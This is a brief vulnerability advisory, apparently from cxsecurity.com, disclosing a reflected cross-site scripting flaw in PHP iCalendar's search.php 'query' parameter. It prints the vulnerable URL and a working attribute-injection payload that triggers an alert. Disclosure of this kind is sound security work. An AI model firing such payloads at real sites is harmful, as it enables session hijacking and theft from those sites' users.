PHP iCalendar Cross Site Scripting (XSS)

2017.10.27
Credit: SonnySpooks
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

------------------------------------------- XSS In PHP ICalendar By SonnySpooks ------------------------------------------- [Contact] Twitter: @SonnySpooks ------------------------------------------- 1. [About App] ------------------------------------------- PHP ICalendar is an ICal file viewer Large sites use it all the time of course It comes suitable and compatible with RSSNF ------------------------------------------- 2. [Issue With It] ------------------------------------------- The Query= Parameter in the Search Bar Does not sanitize Parses all the way. ------------------------------------------- 3. [Replication of attack] ------------------------------------------- Placement: /search.php?cpath=&cal=&getdate=20160424&query=<PayLoad> Example: /search.php?cpath=&cal=&getdate=20160424&query=1" onfocus="alert('XSS')" autofocus=""> ------------------------------------------- ________ /\ \ / \ \ / \ \ / \_______\ \ / / ___\ / ____/___ /\ \ / /\ \ / \ \/___/ \ \ / \ \ \ \ / \_______\ \_______\ \ / / / / \ / / / / \ / /\ / / \/_______/ \/_______/ -------------------------------------------


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top